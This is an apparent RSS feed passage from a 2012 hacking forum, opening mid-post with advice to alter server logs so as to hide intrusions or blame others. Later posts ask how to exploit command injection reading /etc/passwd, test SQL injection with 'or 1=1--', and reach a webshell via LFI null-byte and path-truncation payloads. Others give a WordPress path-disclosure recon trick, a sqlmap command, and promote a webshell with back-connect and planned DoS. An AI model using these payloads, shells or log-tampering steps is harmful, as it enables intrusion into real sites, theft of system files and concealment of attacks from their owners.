and accesed and the browser you used.<br><br>If you want to blame the hack on someone else, i recommend you change the IP and the browser to Mozilla or Iexplore. If you want to hide your tracks completely delete the whole line.<br><br>Once done, save changed and exit your shell. If you click any links within the shell it will record them and all that will have been usless. This is always the last thing to do on a server when your leaving the shell.<br><br><br>I would always recommend you use a VPN or at least a proxy as well as an extra layer of security. If your thinking, Whats the worst that would happen? well view my friends twitter and you will see. Look at the sites he's hacked and look at his most recent posts - <a href="https://twitter.com/bzyklon" target="_blank" rel="nofollow">https://twitter.com/bzyklon</a><br><br>Hope this helps some new commers.<br>]]></description>
   </item>
   <item>
      <title>Code execution</title>
      <link>http://iexploit.org/index.php?p=/discussion/6017/code-execution</link>
      <pubDate>Fri, 04 May 2012 20:58:57 -0400</pubDate>
      <dc:creator>Hardcore-Gabber</dc:creator>
      <guid isPermaLink="false">6017@/index.php?p=/discussions</guid>
      <description><![CDATA[So . i have scanned a site and founde some vulns XSS etc ... but i have finde an interesting vuln too ..&nbsp; The vuln is Code execution .. <br>but i have a problem with this vuln ..&nbsp; the problem is that i cannot recognize what encode type is using Acunetix when is encoding this command ... <br><br>&amp;cat /etc/passwd&amp; this is the command when is not encoded and now when is encoded %26cat%20%2fetc%2fpasswd%26 <br><br>Please cane tell me what encode type is this and also how could i upload a shell with this vuln ... <br><br>also i have made some screens of this vuln ...<br><br><a rel="nofollow" href="http://imageshack.us/g/190/82307930x.png/">http://imageshack.us/g/190/82307930x.png/</a><br>]]></description>
   </item>
   <item>
      <title>SQL InJecTion Problem</title>
      <link>http://iexploit.org/index.php?p=/discussion/6141/sql-injection-problem</link>
      <pubDate>Sat, 01 Sep 2012 17:03:45 -0400</pubDate>
      <dc:creator>a_tek7</dc:creator>
      <guid isPermaLink="false">6141@/index.php?p=/discussions</guid>
      <description><![CDATA[<div><span style="font-family: Arial, Verdana; font-size: small;">I was testing a website and by adding a little ' at the end of</span></div><div><span style="font-family: Arial, Verdana; font-size: small;"><br></span></div><div><span style="font-family: Arial, Verdana; font-size: small;">asp?id=23'</span></div><div><span style="font-family: Arial, Verdana; font-size: small;"><br></span></div><div><span style="font-family: Arial, Verdana; font-size: small;">I found the following error:</span></div><div><span style="font-family: Arial, Verdana; font-size: small;"><br></span></div><div><span style="font-family: Arial, Verdana; font-size: small;">Microsoft OLE DB Provider for ODBC Drivers error '80040e14'&nbsp;</span></div><div><span style="font-family: Arial, Verdana; font-size: small;"><br></span></div><div><span style="font-family: Arial, Verdana; font-size: small;">[Microsoft][ODBC Microsoft Access Driver] Syntax error in query expression 'id like '%23'%''.&nbsp;</span></div><div><span style="font-family: Arial, Verdana; font-size: small;"><br></span></div><div><span style="font-family: Arial, Verdana; font-size: small;">/fa/articlev.asp, line 20&nbsp;</span></div><div><span style="font-family: Arial, Verdana; font-size: small;"><br></span></div><div><span style="font-family: Arial, Verdana; font-size: small;"><br></span></div><div><span style="font-family: Arial, Verdana; font-size: small;">then I tried this one:</span></div><div><span style="font-family: Arial, Verdana; font-size: small;"><br></span></div><div><span style="font-family: Arial, Verdana; font-size: small;">asp?id=23 or 1=1--</span></div><div><span style="font-family: Arial, Verdana; font-size: small;"><br></span></div><div><span style="font-family: Arial, Verdana; font-size: small;">now no error but no text is being displayed but web theme is being displayed.</span></div><div><span style="font-family: Arial, Verdana; font-size: small;"><br></span></div><div><span style="font-family: Arial, Verdana; font-size: small;">I want to know it is exploitable? how can I do it? I've never test Microsoft Access Drive.</span></div>]]></description>
   </item>
   <item>
      <title>How to use /  to LFI</title>
      <link>http://iexploit.org/index.php?p=/discussion/6228/how-to-use-to-lfi</link>
      <pubDate>Thu, 20 Dec 2012 01:02:34 -0500</pubDate>
      <dc:creator>laterain</dc:creator>
      <guid isPermaLink="false">6228@/index.php?p=/discussions</guid>
      <description><![CDATA[<span style="font-family: Arial, Verdana; font-size: small;">vul.php code:</span><div style="font-family: Arial, Verdana; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal;">&lt;%php</div><div style="font-family: Arial, Verdana; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal;">$xx = $_REQUEST['xx'];</div><div style="font-family: Arial, Verdana; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal;">require("./te$xx.php");</div><div style="font-family: Arial, Verdana; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal;">%&gt;</div><div style="font-family: Arial, Verdana; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal;"><br></div><div style="font-family: Arial, Verdana; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal;">I have a webshell at ./shell.txt</div><div style="font-family: Arial, Verdana; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal;">We can GET /vul.php?xx=/../shell.txt%00 to get a shell,</div><div style="font-family: Arial, Verdana; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal;">but the php version must before 5.3.4!</div><div style="font-family: Arial, Verdana; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal;"><br></div><div style="font-family: Arial, Verdana; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal;">However,I had heard another way to get a shell !</div><div style="font-family: Arial, Verdana; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal;">The way is : we can GET /vul.php?xx=/../shell.txt////////////////////////////////(here is so many '/')</div><div style="font-family: Arial, Verdana; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal;"><br></div><div style="font-family: Arial, Verdana; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal;">But,I can't get the shell at last!</div><div style="font-family: Arial, Verdana; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal;">Here is the check code:</div><div style="font-family: Arial, Verdana; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal;"><br></div><div><div><span style="font-family: Arial, Verdana; font-size: small;">&lt;?php</span></div><div><span style="font-family: Arial, Verdana; font-size: small;">$xx = 'shell.txt';</span></div><div><span style="font-family: Arial, Verdana; font-size: small;">for($i=0;$i&lt;=1000000;$i++)&nbsp;</span><span style="font-size: small;">{</span></div><div><span style="font-family: Arial, Verdana; font-size: small;"><span class="Apple-tab-span" style="white-space:pre">	</span>$xx .= '/';</span></div><div><span style="font-family: Arial, Verdana; font-size: small;">}</span></div><div><span style="font-family: Arial, Verdana; font-size: small;">require("./$xx.php");</span></div><div><span style="font-family: Arial, Verdana; font-size: small;">?&gt;</span></div></div><div><span style="font-family: Arial, Verdana; font-size: small;"><br></span></div><div><span style="font-family: Arial, Verdana; font-size: 13px;">Somebody had got a shell by this way!</span></div><div style="font-family: Arial, Verdana; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal;">Did the php have this bug?</div><div style="font-family: Arial, Verdana; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal;">Can you help me ? Thx.</div><div style="font-family: Arial, Verdana; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal;"><br></div><div style="font-family: Arial, Verdana; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal;">PS:I'm not good at English,sorry.</div>]]></description>
   </item>
   <item>
      <title>FPD Recon Vulnerability On Wordpress 3.4.2</title>
      <link>http://iexploit.org/index.php?p=/discussion/6222/fpd-recon-vulnerability-on-wordpress-3-4-2</link>
      <pubDate>Sun, 02 Dec 2012 08:35:29 -0500</pubDate>
      <dc:creator>Mr. P-teo</dc:creator>
      <guid isPermaLink="false">6222@/index.php?p=/discussions</guid>
      <description><![CDATA[<div><span style="font-family: Arial, Verdana; font-size: small;">So i thought id share something which i stumbled upon earlier today, after a bit of research i discovered it wasn't just the site i was building that was vuln to Full Path Disclosure but almost all Wordpress sites.</span></div><div><span style="font-family: Arial, Verdana; font-size: small;"><br></span></div><div><span style="font-family: Arial, Verdana; font-size: small;">As FPD isn't massively useful unless you'r gathering info i thought i'd share it with you guys.</span></div><div><span style="font-family: Arial, Verdana; font-size: small;"><br></span></div><div><span style="font-family: Arial, Verdana; font-size: small;">So where can you find this vuln?</span></div><div><span style="font-family: Arial, Verdana; font-size: small;"><br></span></div><div><span style="font-family: Arial, Verdana; font-size: small;">Most Wordpress themes include a functions.php file which links to other files and it's this file which has the vulnerability.</span></div><div><span style="font-family: Arial, Verdana; font-size: small;"><br></span></div><div><span style="font-family: Arial, Verdana; font-size: small;">So just view the source of a wordpress site and visit the link of the CSS file, then change the CSS file name to [b]functions.php[/b].</span></div><div><span style="font-family: Arial, Verdana; font-size: small;"><br></span></div><div><span style="font-family: Arial, Verdana; font-size: small;">If you need an example try my site that is no longer in use. <a href="http://urbanscoop.net" target="_blank" rel="nofollow">http://urbanscoop.net</a></span></div><div><span style="font-family: Arial, Verdana; font-size: small;"><br></span></div><div><span style="font-family: Arial, Verdana; font-size: small;">So if your looking to do a little recon on a wordpress site this should help you.</span></div><div><br></div>]]></description>
   </item>
   <item>
      <title>How to make Time based blind injection with sqlmap ?</title>
      <link>http://iexploit.org/index.php?p=/discussion/6221/how-to-make-time-based-blind-injection-with-sqlmap-</link>
      <pubDate>Thu, 29 Nov 2012 11:26:47 -0500</pubDate>
      <dc:creator>bakie</dc:creator>
      <guid isPermaLink="false">6221@/index.php?p=/discussions</guid>
      <description><![CDATA[<span style="font-family: Arial, Verdana; font-size: small;">How to make Time based blind injection with sqlmap ?</span><div><span style="font-family: Arial, Verdana; font-size: small;">I wanna know&nbsp;</span><span style="font-family: Arial, Verdana; font-size: small;">Time based blind injection with sqlmap in detail&nbsp;</span></div><div><span style="font-family: Arial, Verdana; font-size: small;">plx explain and live demo wanna see&nbsp;</span></div>]]></description>
   </item>
   <item>
      <title>how to inject like this url with sqlmap or other tool or manual</title>
      <link>http://iexploit.org/index.php?p=/discussion/6215/how-to-inject-like-this-url-with-sqlmap-or-other-tool-or-manual</link>
      <pubDate>Fri, 23 Nov 2012 07:32:15 -0500</pubDate>
      <dc:creator>bakie</dc:creator>
      <guid isPermaLink="false">6215@/index.php?p=/discussions</guid>
      <description><![CDATA[<p style="margin: 0px 0px 1em; padding: 0px; border: 0px; vertical-align: baseline; clear: both; word-wrap: break-word; background-color: rgb(255, 255, 255);"></p><p style="margin: 0px 0px 1em; padding: 0px; border: 0px; vertical-align: baseline; clear: both; word-wrap: break-word;"><span style="font-family: Helvetica Neue, Arial, sans-serif; color: #333333;"><span style="font-size: 14px; line-height: 18px;">When url www.site.com/view.php?var=15&amp;name=old</span></span></p><p style="margin: 0px 0px 1em; padding: 0px; border: 0px; vertical-align: baseline; clear: both; word-wrap: break-word;"><span style="font-family: Helvetica Neue, Arial, sans-serif; color: #333333;"><span style="font-size: 14px; line-height: 18px;"><br></span></span></p><p style="margin: 0px 0px 1em; padding: 0px; border: 0px; vertical-align: baseline; clear: both; word-wrap: break-word;"><span style="font-family: Helvetica Neue, Arial, sans-serif; color: #333333;"><span style="font-size: 14px; line-height: 18px;">To specify the parameter in SQLmap all you have to do is use a -p switch as shown below,</span></span></p><p style="margin: 0px 0px 1em; padding: 0px; border: 0px; vertical-align: baseline; clear: both; word-wrap: break-word;"><span style="font-family: Helvetica Neue, Arial, sans-serif; color: #333333;"><span style="font-size: 14px; line-height: 18px;"><br></span></span></p><p style="margin: 0px 0px 1em; padding: 0px; border: 0px; vertical-align: baseline; clear: both; word-wrap: break-word;"><span style="font-family: Helvetica Neue, Arial, sans-serif; color: #333333;"><span style="font-size: 14px; line-height: 18px;">./sqlmap.py -u "<a href="http://www.site.com/view.php?var=15&amp;name=old" target="_blank" rel="nofollow">http://www.site.com/view.php?var=15&amp;name=old</a>" -p "var"</span></span></p><p style="margin: 0px 0px 1em; padding: 0px; border: 0px; vertical-align: baseline; clear: both; word-wrap: break-word;"><span style="font-family: Helvetica Neue, Arial, sans-serif; color: #333333;"><span style="font-size: 14px; line-height: 18px;"><br></span></span></p><p style="margin: 0px 0px 1em; padding: 0px; border: 0px; vertical-align: baseline; clear: both; word-wrap: break-word;"><span style="font-family: Helvetica Neue, Arial, sans-serif; color: #333333;"><span style="font-size: 14px; line-height: 18px;">when url <a href="http://www.site.com/index.php/en/library/category/37-2012-ydb" target="_blank" rel="nofollow">http://www.site.com/index.php/en/library/category/37-2012-ydb</a></span></span></p><p style="margin: 0px 0px 1em; padding: 0px; border: 0px; vertical-align: baseline; clear: both; word-wrap: break-word;"><span style="color: rgb(51, 51, 51); font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 14px; line-height: 18px;">1) How can I inject with sqlmap ?</span></p><p style="margin: 0px 0px 1em; padding: 0px; border: 0px; vertical-align: baseline; clear: both; word-wrap: break-word;"><span style="font-family: Helvetica Neue, Arial, sans-serif; color: #333333;"><span style="font-size: 14px; line-height: 18px;"><br></span></span></p><p style="margin: 0px 0px 1em; padding: 0px; border: 0px; vertical-align: baseline; clear: both; word-wrap: break-word;"><span style="font-family: Helvetica Neue, Arial, sans-serif; color: #333333;"><span style="font-size: 14px; line-height: 18px;">2) How many types for the sql injections ?</span></span></p><p style="margin: 0px 0px 1em; padding: 0px; border: 0px; vertical-align: baseline; clear: both; word-wrap: break-word;"><span style="font-size: 14px; line-height: 18px; color: rgb(51, 51, 51); font-family: 'Helvetica Neue', Arial, sans-serif;">I wanna know detail bro , plz help me</span></p><p style="margin: 0px 0px 1em; padding: 0px; border: 0px; vertical-align: baseline; clear: both; word-wrap: break-word;"><span style="font-family: Helvetica Neue, Arial, sans-serif; color: #333333;"><span style="font-size: 14px; line-height: 18px;"><br></span></span></p><p style="color: rgb(51, 51, 51); font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 14px; font-style: normal; font-variant: normal; font-weight: normal; line-height: 18px; margin: 0px 0px 1em; padding: 0px; border: 0px; vertical-align: baseline; clear: both; word-wrap: break-word;"><br></p>]]></description>
   </item>
   <item>
      <title>is there any book out the for understanding browser internals ?</title>
      <link>http://iexploit.org/index.php?p=/discussion/6165/is-there-any-book-out-the-for-understanding-browser-internals-</link>
      <pubDate>Sat, 08 Sep 2012 08:47:27 -0400</pubDate>
      <dc:creator>mandi</dc:creator>
      <guid isPermaLink="false">6165@/index.php?p=/discussions</guid>
      <description><![CDATA[<div class="post_body" id="pid_26249152"><br>					hi guys,<br><br>as the title says is there any books available for understanding internal working of browser ?<br><br><br><br>i am much interested in understanding how browsers work ?(in detail) what are the <br>security features out there,how they are implemented and all..<br><br>as far as i had searched i couldn't find any thing.<br><br><br><br>so decided to ask here,if you have any recommendations please post here :)<br>				</div><br>				<br>				<br>]]></description>
   </item>
   <item>
      <title>Assigning the return value of new by reference is deprecated bug</title>
      <link>http://iexploit.org/index.php?p=/discussion/6146/assigning-the-return-value-of-new-by-reference-is-deprecated-bug</link>
      <pubDate>Tue, 04 Sep 2012 01:20:07 -0400</pubDate>
      <dc:creator>a_tek7</dc:creator>
      <guid isPermaLink="false">6146@/index.php?p=/discussions</guid>
      <description><![CDATA[<div style="font-family: Arial, Verdana; font-size: 10pt; font-weight: normal;"><b style="font-family: 'Times New Roman'; font-size: medium;">I was visiting a website and I found these errors at the top of the page:</b></div><b style="font-family: 'Times New Roman'; font-size: medium; font-weight: normal;"><b style="font-family: 'Times New Roman'; font-size: medium;"><br></b>Deprecated</b><span style="font-family: 'Times New Roman'; font-size: medium; font-weight: normal;">: Assigning the return value of new by reference is deprecated in&nbsp;</span><b style="font-family: 'Times New Roman'; font-size: medium; font-weight: normal;">/data/32/1/91/103/1743918/user/1883987/htdocs/AAAAA/inc/items/model/_item.class.php</b><span style="font-family: 'Times New Roman'; font-size: medium; font-weight: normal;">&nbsp;on line&nbsp;</span><b style="font-family: 'Times New Roman'; font-size: medium; font-weight: normal;">3032</b><br style="font-family: 'Times New Roman'; font-size: medium;"><br style="font-family: 'Times New Roman'; font-size: medium;"><b style="font-family: 'Times New Roman'; font-size: medium; font-weight: normal;">Warning</b><span style="font-family: 'Times New Roman'; font-size: medium; font-weight: normal;">: Cannot modify header information - headers already sent by (output started at /data/32/1/91/103/1743918/user/1883987/htdocs/hacktivision/inc/_main.inc.php:205) in</span><b style="font-family: 'Times New Roman'; font-size: medium; font-weight: normal;">/data/32/1/91/103/1743918/user/1883987/htdocs/AAAAAA/inc/skins/_skin.funcs.php</b><span style="font-family: 'Times New Roman'; font-size: medium; font-weight: normal;">&nbsp;on line&nbsp;</span><b style="font-family: 'Times New Roman'; font-size: medium; font-weight: normal;">379</b><div style="font-family: Arial, Verdana; font-size: 10pt; font-weight: normal;"><b style="font-family: 'Times New Roman'; font-size: medium;"><br></b></div><div><b>Are these error indicate some kind of vulnerability and exploitable??what this vulnerability called?</b></div><div><b><br></b></div><div><b>Regards</b></div><div><b><br></b></div><div><b>A_tek7</b></div>]]></description>
   </item>
   <item>
      <title>[OutDated] - Free G6 Web PHP Shell - Coded by Mr. P-teo</title>
      <link>http://iexploit.org/index.php?p=/discussion/6130/outdated-free-g6-web-php-shell-coded-by-mr-p-teo</link>
      <pubDate>Tue, 28 Aug 2012 16:33:35 -0400</pubDate>
      <dc:creator>Mr. P-teo</dc:creator>
      <guid isPermaLink="false">6130@/index.php?p=/discussions</guid>
      <description><![CDATA[So, a while back i started working on a PHP shell as i wanted to improve my PHP knowledge, so far its been private with only a few testing the shell. i plan to add many more features but <br>currently i want to get some opinions of my work so far, and what could be added. I know there is an issue with the upload, im working on it. And i haven't managed to bypass "GET Method not implemented" yet.<br><br>&nbsp;So Here are some screenshots.<br><br><br><img src="http://i.imgur.com/yWDud.pnghttp://" height="1155" width="568" alt="image"><br><br><br><b>Features</b><br>File Explore<br>Read File Source Code<br>File Upload<br>Teminal<br>Back Connect<br>Server Information<br>Hash Identifier<br>Admin Finder<br><br><br><b>Going to be adding:</b><br>Web-Based Proxy Browser<br>Dos<br>Symlink<br><br><br>Here is the source - <a href="http://pastebin.com/kTweecrm" target="_blank" rel="nofollow">http://pastebin.com/kTweecrm</a><br><br>Note i will be updating it soon.<br><br>]]></description>
   </item>
   </channel>
</rss>